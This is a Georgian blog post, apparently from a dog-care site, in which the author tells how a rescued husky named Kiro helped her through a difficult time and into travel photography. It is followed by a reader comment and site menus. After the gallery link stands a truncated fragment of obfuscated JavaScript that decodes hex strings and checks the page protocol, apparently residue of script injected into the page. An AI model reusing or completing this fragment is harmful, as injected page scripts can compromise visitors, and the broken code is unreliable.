"ოქროსთმიანი და მგელი" - ანუ ისტორია იმაზე, თუ როგორ გადავარჩინე მე ჰასკი და როგორ გადამარჩინა მან მე! (+ფოტო)
"ოქროსთმიანი და მგელი" - ანუ ისტორია იმაზე, თუ როგორ გადავარჩინე მე ჰასკი და როგორ გადამარჩინა მან მე! (+ფოტო)
ჩვენი ისტორია სამი წლის წინ დაიწყო. კირო Craigslis-ზე განცხადებით ვიპოვე. დედა ძაღლმა უარი თქვა მასზე და მის 9 ძმაზე. პატრონმა მთხოვა დავხმარებოდი მათ გაზრდაში და მეც სიამოვნებით ვეხმარებოდი, ვაჭმევდი პატარებს ბოთლით, შემდეგ მათ სხვადასხვა პატრონის ოჯახებში მოწყობაშიც დავეხმარე. ამგვარად, კირო ჩემთან აღმოჩნდა.

კირო მაშინ გაჩნდა ჩემს ცხოვრებაში, როდესაც დიდი პრობლემები მქონდა. ის ჩემს სამყაროდ იქცა. ჩვენ მოგზაურობა დავიწყეთ. რამოდენიმე ხანში მე ფოტოგრაფიამ გამიტაცა და ამ მოგზაურობის დოკუმენტირება ჩემს შთაგონებად იქცა. ბოლოს, ნანატრი სიმშვიდეც მოვიდა და ნელ-ნელა ჩემი სულიერი წონასწორობა აღსდგა.

ზედმეტსახელი
ოქროსთმიანი და მგელი დედამ შეგვარქვა. ასე ვართ მე და კირო ინსტაგრამში. კამერით მე ჩვენს საერთო
“ზღაპარს” ვაფიქსირებდი, სადაც მთავარი გმირი ფუმფულა ცისფერთვალა კირო იყო. კიროსთან ერთად მე გამბედაობა მემატებოდა და იმას ვაკეთებდი, რის გაკეთებასაც ადრე არც კი ვცდიდი. მაგალითად, დილის 3 საათზე ვიღვიძებდი იმისთვის, რომ მზის ამოსვლა მენახა.

სად იქნებოდა კირო თუ არა ჩემთან? წარმოდგენაც არ მინდა. ყოველ დღე მადლობას ვწირავ ღმერთს, რომ კირო ჩემთან ერთად არის. ჩვენ ერთმანეთის ანარეკლები გავხდით. მან ჩემს გულში დიდი ადგილი დაიმკვიდრა, ჩემგან ყველა შიში გააძევა და სულში ჩამხედა. კირომ საკუთარ თავში დამანახა ადამიანი, რომლის დანახვაც აქამდე არ შემეძლო. დამანახა ის ადამიანი, რომელიც ყოველთვის მინდოდა ვყოფილიყავი. კიროს თვალებში ბევრი რამის ახსნა ჩანს - თითქოს მან 100 სიცოცხლე იცხოვრა.

კირომ გამიძლიერა რწმენა იმისა, რომ ყველანაირი რთული სიტუაციიდან გამოსავალი არსებობს.

ახლა შემიძლია ჩემი ისტორია მთელ მსოფლიოს გავუზიარო. ადვილი არ არის ჩავლილი ღალატის გახსენება, მაგრამ მინდა, სხვას დავეხმარო იმის დანახვაში, რომ ცუდშიც არის კარგი მხარეები და ერთხელ თქვენ ხელახლა დაიბადებით. მე ჩემი ოთხფეხა "რაინდი" ვიპოვე. ვინ იცის თქვენი რაინდი სად გელოდებათ.

ბედნიერებაა, რომ მე ჩემი ცისფერთვალა ფუმფულა გმირი მყავს.

იხილეთ ფოტოგალერეა // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o {var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
გალერეა
ნინო
ბედნიერი ქალი ხარ ოქროსთმიანო,ასეთი მეგობარი გყავს გვერდით.შენი გადაღებული ფოტოებიც ძალიან მომეწონა
დახმარება
  • რა ვაჭამოთ?
  • ჯიშები
  • სად ვიყიდოთ?
გამოკითხვა
რომელი ბრენდის საკვებს აჭმევთ თქვენს ძაღლს?